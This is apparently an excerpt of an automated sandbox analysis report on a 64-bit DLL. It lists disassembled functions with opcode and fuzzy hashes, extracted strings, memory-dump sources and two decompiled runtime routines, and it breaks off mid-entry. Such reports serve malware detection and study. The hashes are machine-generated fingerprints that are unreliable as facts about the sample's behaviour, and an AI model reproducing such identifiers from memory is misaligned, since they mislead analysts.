API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: 1919c1110502d15319449504d6e91b7fa88324414ab81abcf7b1c29e64ecc28d
Instruction ID: 12f27fef96dc8894754dd231533b976fb372cf9f09be1d3cddb09b50d4677c93
Opcode Fuzzy Hash: 1919c1110502d15319449504d6e91b7fa88324414ab81abcf7b1c29e64ecc28d
Instruction Fuzzy Hash: 2221267065DB449FE388DF29C48961BBAE1FBD8340F905A1EF885C2360C734D845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000C364 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

BsL, xrefs: 000000018000C40D

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: BsL
API String ID: 0-590970710
Opcode ID: 4c7ca18370d47a9c2cceab002f43e00c4595808ca112b21f17e8f3d7773031d4
Instruction ID: bf3e705d0a3e127a6b239d821588e89859f67f6db20862a07d3c8d6d25b0e04a
Opcode Fuzzy Hash: 4c7ca18370d47a9c2cceab002f43e00c4595808ca112b21f17e8f3d7773031d4
Instruction Fuzzy Hash: 41317DB1529780AFD3C8DF28C48691BBBE0FB89314F816A2DF9C586260D374D455CF02

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001CCC Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

ZR, xrefs: 0000000180001DEC

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ZR
API String ID: 0-4130514108
Opcode ID: 6cbb8a842fd3cc15b819203d482a3a3b46369313eab12406f6265ee7f7ea0382
Instruction ID: b13af9977396cc860318babd94d7947ade869d3bdb5f1587fd609083ec60b6d4
Opcode Fuzzy Hash: 6cbb8a842fd3cc15b819203d482a3a3b46369313eab12406f6265ee7f7ea0382
Instruction Fuzzy Hash: 0B316EB052D780AFD388DF28C49691ABBE1FBC5315F806A1DF9968B350D774D445CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005478 Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

%F, xrefs: 0000000180005566

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: %F
API String ID: 0-915744445
Opcode ID: cf4e8b82da0d821891615694ed2d7715b09984878493b04af082e458cdddcb63
Instruction ID: f3632c01bd7492b9d648e83c8b8289f5be8476ad9f7b0aa526bfe9f17a615d29
Opcode Fuzzy Hash: cf4e8b82da0d821891615694ed2d7715b09984878493b04af082e458cdddcb63
Instruction Fuzzy Hash: A1317AB15087809BD348DF28D44A45ABBE1BB9C31CF414B1DF4CAAB254D3B9D608CF0A

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E708 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

>, xrefs: 000000018000E80A

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: >
API String ID: 0-1166260821
Opcode ID: 7fdb2c55224cd27c72bb618ee64ca03bed07baaed02b8a8707ebf8ca8fbe557d
Instruction ID: a3d582c264d7a48cbd0e974e941d71c0af5034fa157bb054186120ff964f1b5c
Opcode Fuzzy Hash: 7fdb2c55224cd27c72bb618ee64ca03bed07baaed02b8a8707ebf8ca8fbe557d
Instruction Fuzzy Hash: 4F316BB55083808FD788DF28D45941ABBE0BB9C358F404B2DF4CAA72A1D778DA45CF0A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009D24 Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

-, xrefs: 0000000180009D48

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: -
API String ID: 0-524432557
Opcode ID: ab6574b7591fa644ef4a174e0089e3a7f2dde0b4bdacdeb17973816cbe5b2230
Instruction ID: 2743ae798d84361f3c47c0844efe4056bc1e573d44da25ce9fa5af028cbcbbd6
Opcode Fuzzy Hash: ab6574b7591fa644ef4a174e0089e3a7f2dde0b4bdacdeb17973816cbe5b2230
Instruction Fuzzy Hash: E22160B152D780AFD388DF29D18991BBBE0BB85344F806E1DF8C68B250D7B5D845CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018560 Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

9D, xrefs: 00000001800185F7

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 9D
API String ID: 0-1055660748
Opcode ID: 7e3a213964b2efcfd3778a88dd8b399f98e251b5205d52f3c39e35f889fd4133
Instruction ID: 2b980fabc4745c60efad4018d3cdf33bc582eba9e1b676cceb4e0857b73aa84d
Opcode Fuzzy Hash: 7e3a213964b2efcfd3778a88dd8b399f98e251b5205d52f3c39e35f889fd4133
Instruction Fuzzy Hash: 6C2179B450C3858BD348DF28D14A51ABBE0BB9C70CF400B5DF8CAAB254D778D644CB0A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180022A84 Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

]i, xrefs: 0000000180022A88

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ]i
API String ID: 0-2057496602
Opcode ID: 986d758f6ca8ef85e847a0378ae5df520f089d8d24386f824cd21791a7bd6731
Instruction ID: 4a116e0a0ac8943674a44645b40dd0a83197eee35043817acb7aa81aadce2f0a
Opcode Fuzzy Hash: 986d758f6ca8ef85e847a0378ae5df520f089d8d24386f824cd21791a7bd6731
Instruction Fuzzy Hash: 492154B45087858BD398DF28D48A50AFBE0BB9C318F400B1DF4C9A62A4D77DDA45CB0A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001B5C Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

x{, xrefs: 0000000180001BB9

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: x{
API String ID: 0-1642613173
Opcode ID: 63a3ae9201259adcdbe27aaae2969a84c8f8b5356c3378407a4e6cf7a642a0a4
Instruction ID: cfab1a828be9d4f11d62def22584f191cf8c0c6105b21f987aeed96694dfa2d1
Opcode Fuzzy Hash: 63a3ae9201259adcdbe27aaae2969a84c8f8b5356c3378407a4e6cf7a642a0a4
Instruction Fuzzy Hash: 992126B55097849BE348DF28C08A51BBBE1BB9C31CF810B1DF4CAA7254D378D649CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466DD90 Relevance: 1.3, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FFD7FFD1466DD90(long long __rax) {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x146df930 = __rax;
				return _t3 & 0xffffff00 | __rax != 0x00000000;
			}

0x7ffd1466dd94
0x7ffd1466dd9d
0x7ffd1466ddab

APIs

GetProcessHeap.KERNEL32 ref: 00007FFD1466DD94

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: d636a00b42bd7fb21fd81f09ca247f2baf2d4d4e689b7af4b01eea6171bd139b
Instruction ID: b7926f4e2cc7ac0834493ea1aeb198cb00baba61401d267fc3a497301f80e535
Opcode Fuzzy Hash: d636a00b42bd7fb21fd81f09ca247f2baf2d4d4e689b7af4b01eea6171bd139b
Instruction Fuzzy Hash: AEB09220F27E02D6FA082B31ACE225422A47F4A728F880038C54C40320DF3C20BA5710

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015694 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 242dba147a3b42ea0af5cfec930ece5e83433d0fba20fb6d2f2fe3008541b1f6
Instruction ID: acc53311729b3702271ddd4d27c6e114e7717bdbebfd3a0864e34ca081a3005a
Opcode Fuzzy Hash: 242dba147a3b42ea0af5cfec930ece5e83433d0fba20fb6d2f2fe3008541b1f6
Instruction Fuzzy Hash: C691197090470CAFDB98DF68C04669DBBF2FB48344F40C1ADE849AB690D7759A19CB85

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001B2F0 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ff37af258a23db5c01797c23f2434de8658ec910b62f667d3e0b084e4f6255
Instruction ID: ee1a5b038e23b1b762728b601e6c99c8254ef48870683394c78a05e9b81e4730
Opcode Fuzzy Hash: f4ff37af258a23db5c01797c23f2434de8658ec910b62f667d3e0b084e4f6255
Instruction Fuzzy Hash: 9A61457160460C8BDB6CDF38D4866A93BE5FB58740F24613DF866C72A2DB74D906CB44

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000741C Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 411371247076829a3ed050940fe1e65d63f7276580b25cd8f2de86b758f4f241
Instruction ID: 124210ae31362696c8e7c7fc55ee17b9d1fa189669067b7980e05abe0ce7dbb4
Opcode Fuzzy Hash: 411371247076829a3ed050940fe1e65d63f7276580b25cd8f2de86b758f4f241
Instruction Fuzzy Hash: 9C81CF7190471C8FEB65DFA8C48968DBFF0FB58388F20461EE815A7262DB749945CF81

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001629C Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dac85506b1f04058cb15554c85bbceb8ebb7a831f5bd702a5d02e9f92134646
Instruction ID: 378d96e7360db12acf5ccb9a2c1092155fc294dfe99add9db15bd0895a73080d
Opcode Fuzzy Hash: 9dac85506b1f04058cb15554c85bbceb8ebb7a831f5bd702a5d02e9f92134646
Instruction Fuzzy Hash: 74516C71524A8CABDBCDCE28D8C6A993BA0FB15344F90621DFC46C7292CB74D985CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466ABC0 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a302809728b8e03c07a5101cfacb15d383c3ede7fbfee8270d7ccf682f85e519
Instruction ID: 3d2d458b1477ee9140eac3e5ef192849501865c73efb1486efa950bba081b45f
Opcode Fuzzy Hash: a302809728b8e03c07a5101cfacb15d383c3ede7fbfee8270d7ccf682f85e519
Instruction Fuzzy Hash: 36412591F69BDA47FE039E7A58237B40A00AFA77D5E41E332ED0B77B01EB2D54468200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466A370 Relevance: .1, Instructions: 126
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 60%

			E00007FFD7FFD1466A370(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
				void* _t24;
				int _t26;
				signed int _t51;
				void* _t52;
				signed long long _t66;
				signed int* _t73;
				signed long long _t75;
				signed long long _t77;
				signed long long _t78;
				signed long long _t95;
				signed long long _t96;
				signed long long _t98;
				signed long long _t104;
				long long _t115;
				void* _t117;
				void* _t120;
				signed long long* _t123;
				signed long long _t124;
				signed long long _t126;
				signed long long _t129;
				signed long long*** _t132;

				_t52 = __edi;
				_t51 = __edx;
				 *((long long*)(_t117 + 0x10)) = __rbx;
				 *((long long*)(_t117 + 0x18)) = _t115;
				 *((long long*)(_t117 + 0x20)) = __rsi;
				_t66 =  *((intOrPtr*)(__rcx));
				_t132 = __rcx;
				_t73 =  *_t66;
				if (_t73 == 0) goto 0x1466a504;
				_t124 =  *0x146de008; // 0xef3156171c50
				_t111 =  *_t73 ^ _t124;
				asm("dec eax");
				_t75 = _t73[4] ^ _t124;
				asm("dec ecx");
				asm("dec eax");
				if ((_t73[2] ^ _t124) != _t75) goto 0x1466a476;
				_t77 = _t75 - ( *_t73 ^ _t124) >> 3;
				_t101 =  >  ? _t66 : _t77;
				_t6 = _t115 + 0x20; // 0x20
				_t102 = ( >  ? _t66 : _t77) + _t77;
				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77;
				if (( ==  ? _t66 : ( >  ? _t66 : _t77) + _t77) - _t77 < 0) goto 0x1466a412;
				_t7 = _t115 + 8; // 0x8
				r8d = _t7;
				E00007FFD7FFD1466D858(_t6, r10d & 0x0000003f, __esp, _t77, _t111,  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77, _t111, _t115, _t120);
				_t24 = E00007FFD7FFD1466A9DC(_t66, _t111);
				if (_t66 != 0) goto 0x1466a43a;
				_t104 = _t77 + 4;
				r8d = 8;
				E00007FFD7FFD1466D858(_t24, 0, __esp, _t77, _t111, _t104, _t111, _t115, _t120);
				_t129 = _t66;
				_t26 = E00007FFD7FFD1466A9DC(_t66, _t111);
				if (_t129 == 0) goto 0x1466a504;
				_t123 = _t129 + _t77 * 8;
				_t78 = _t129 + _t104 * 8;
				_t88 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
				_t64 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
				if (( >  ? _t115 : _t78 - _t123 + 7 >> 3) == 0) goto 0x1466a476;
				memset(_t52, _t26, 0 << 0);
				_t126 =  *0x146de008; // 0xef3156171c50
				r8d = 0x40;
				_t14 =  &(_t123[1]); // 0x7ffd14661024
				asm("dec eax");
				 *_t123 =  *(_t132[1]) ^ _t126;
				_t95 =  *0x146de008; // 0xef3156171c50
				asm("dec eax");
				 *( *( *_t132)) = _t129 ^ _t95;
				_t96 =  *0x146de008; // 0xef3156171c50
				asm("dec eax");
				( *( *_t132))[1] = _t14 ^ _t96;
				_t98 =  *0x146de008; // 0xef3156171c50
				r8d = r8d - (_t51 & 0x0000003f);
				asm("dec eax");
				( *( *_t132))[2] = _t78 ^ _t98;
				goto 0x1466a507;
				return 0xffffffff;
			}

0x7ffd1466a370
0x7ffd1466a370
0x7ffd1466a370
0x7ffd1466a375
0x7ffd1466a37a
0x7ffd1466a388
0x7ffd1466a38d
0x7ffd1466a390
0x7ffd1466a396
0x7ffd1466a39c
0x7ffd1466a3b4
0x7ffd1466a3ba
0x7ffd1466a3bd
0x7ffd1466a3c0
0x7ffd1466a3c3
0x7ffd1466a3c9
0x7ffd1466a3d7
0x7ffd1466a3e1
0x7ffd1466a3e5
0x7ffd1466a3e8
0x7ffd1466a3eb
0x7ffd1466a3f2
0x7ffd1466a3f4
0x7ffd1466a3f4
0x7ffd1466a3fe
0x7ffd1466a408
0x7ffd1466a410
0x7ffd1466a412
0x7ffd1466a416
0x7ffd1466a422
0x7ffd1466a429
0x7ffd1466a42c
0x7ffd1466a434
0x7ffd1466a441
0x7ffd1466a445
0x7ffd1466a45d
0x7ffd1466a461
0x7ffd1466a464
0x7ffd1466a46c
0x7ffd1466a46f
0x7ffd1466a476
0x7ffd1466a47c
0x7ffd1466a495
0x7ffd1466a49b
0x7ffd1466a49e
0x7ffd1466a4b1
0x7ffd1466a4ba
0x7ffd1466a4c0
0x7ffd1466a4d1
0x7ffd1466a4da
0x7ffd1466a4de
0x7ffd1466a4ea
0x7ffd1466a4f3
0x7ffd1466a4fe
0x7ffd1466a502
0x7ffd1466a51f

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: ErrorLastPrivilegeRelease
String ID:
API String ID: 1334314998-0
Opcode ID: ed3b70687e7945458bcaab2cb262aa06014580efde759abfe4f9ab75d549e353
Instruction ID: e78ad54d180a482a6922c2622f80c195713e8a6e36617b5064d4972d77acc407
Opcode Fuzzy Hash: ed3b70687e7945458bcaab2cb262aa06014580efde759abfe4f9ab75d549e353
Instruction Fuzzy Hash: AD41B322714E5482FF44CF3AD9681A963A1BB4AFF8B499036EE4D87B58DE3CD4468300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013698 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fd7e54c2e3c2eb2f4057fbf02f2f3a8737c251e610f5f48a5c25456a3c2a7c7
Instruction ID: 707c8c7feef62a70d2195b75d5e6b66e4219545dc678810288b7b2209aceacb9
Opcode Fuzzy Hash: 0fd7e54c2e3c2eb2f4057fbf02f2f3a8737c251e610f5f48a5c25456a3c2a7c7
Instruction Fuzzy Hash: 1161917154878DDBEBBACF24D88A7D97BB0FB48314F904219D84E8E290DB74574ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180011DAC Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a779fa67324b10137dca71439002aac2bbc9acba917943a89a2440558f265d6
Instruction ID: 49561eaafaa20b5dbb512bdc2e8c8324cc323e320cbd5a294de7a2bbabfa02a5
Opcode Fuzzy Hash: 8a779fa67324b10137dca71439002aac2bbc9acba917943a89a2440558f265d6
Instruction Fuzzy Hash: 3351B07051478C8BEBBACF28DC9A7DB3BB1FB48704F50421DA84E8E2A0DB765645CB41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D1AC Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de15e4835354da21c21c581afa9e1e49ad56d5e721c00a56a2a0f9a367a7b1e2
Instruction ID: cab1e4afcb3e4e3efad056c987e19407a7ae96f8ba765043352ee3f473a28ce2
Opcode Fuzzy Hash: de15e4835354da21c21c581afa9e1e49ad56d5e721c00a56a2a0f9a367a7b1e2
Instruction Fuzzy Hash: 7A51597191474DCBDF6DCF68C88A6DDBBB0FF08344F004219E94662291DB799949CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180020930 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1891d7c6e5579f1ddf716b9efe699b55b9d074dc8e7dc217c6cd483ac21faf1f
Instruction ID: 0d5a1e45f689093ba705f26d6d0b7ee4761fe465e88e59cb2662693f670c6f5b
Opcode Fuzzy Hash: 1891d7c6e5579f1ddf716b9efe699b55b9d074dc8e7dc217c6cd483ac21faf1f
Instruction Fuzzy Hash: 99517CB590034A8FDB88CF64C58A4DF7FB0BB68398F204619F856962A0D374D6A5CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E570 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0947fb190b259f2f036e8e13266f38e419df21044a1d34d71fc6672665701d99
Instruction ID: 6b1a579500f7469a5a283cf0a7520b14203c8905753f3a8ac0622774f88945dd
Opcode Fuzzy Hash: 0947fb190b259f2f036e8e13266f38e419df21044a1d34d71fc6672665701d99
Instruction Fuzzy Hash: 1241D3B050034E8BDB48CF64D88A4DE7FF0FB68398F214619F859A6250D378D6A4CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013524 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95e6112c03750f4c0630cdb5a18b98eee8cc7382c4e8c9e1a176535c4f274712
Instruction ID: 4275e61531d4984f43622383f8721a212c43d9f9e5acc043d588a3e2cbca8aaf
Opcode Fuzzy Hash: 95e6112c03750f4c0630cdb5a18b98eee8cc7382c4e8c9e1a176535c4f274712
Instruction Fuzzy Hash: 0741D2B090074E8FDB48CF64C98A5DE7FB1FBA8394F204219EC4AA6250D374D6A4CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015508 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8348d3cd7f29255d4884c11fe93a9125b21d4f4a43616c69afa397f7f63962af
Instruction ID: afd4a856b60e5dc0eb8acee87462e8dc665325ca188dc724d3a88843a6c40c3d
Opcode Fuzzy Hash: 8348d3cd7f29255d4884c11fe93a9125b21d4f4a43616c69afa397f7f63962af
Instruction Fuzzy Hash: 6041AFB180438E8FDF48CF64C88A5DE7BB0FB58348F104A19E86696264D3B9D664CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180017198 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c4ca00263a0247c4b651e916fb7a83a9bfa1ce2ae173780690b90c0a27bb6f5
Instruction ID: 224c6f81855e22c7893a2b7f2b7cfff3a5734a3a9938c9b8f57012155b825125
Opcode Fuzzy Hash: 6c4ca00263a0247c4b651e916fb7a83a9bfa1ce2ae173780690b90c0a27bb6f5
Instruction Fuzzy Hash: 3041B1B090478E8BDF49CF68D84A5DE7BA0FB58348F104A1DEC66A6294D3B4D664CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001E614 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f2ddded83ff06c7b56f3b031172a418f339d67288712c2ef59fbdfb7de3fa65
Instruction ID: 49a2f425b0a366156263d2a3b3444c35eadce35315b0c57ee30031dbbbdec485
Opcode Fuzzy Hash: 6f2ddded83ff06c7b56f3b031172a418f339d67288712c2ef59fbdfb7de3fa65
Instruction Fuzzy Hash: FB41E6B090034A8BDF48DF68C88A5DE7FB1FB58358F10461DF85AA6390D37896A5CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013B88 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9a747ab3829d035c160e30ca67f218d8c010ef4ce6a01bc2123f51e37c39b15
Instruction ID: 6daa388222a5a84c7974237e422c02caa7ff578f64bce21c4d2575711bd59858
Opcode Fuzzy Hash: e9a747ab3829d035c160e30ca67f218d8c010ef4ce6a01bc2123f51e37c39b15
Instruction Fuzzy Hash: EB41D5B190074E8BDF48CF64C48A5DE7FB0FB68358F214618E855A6290D3B8D6A5CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000BE34 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
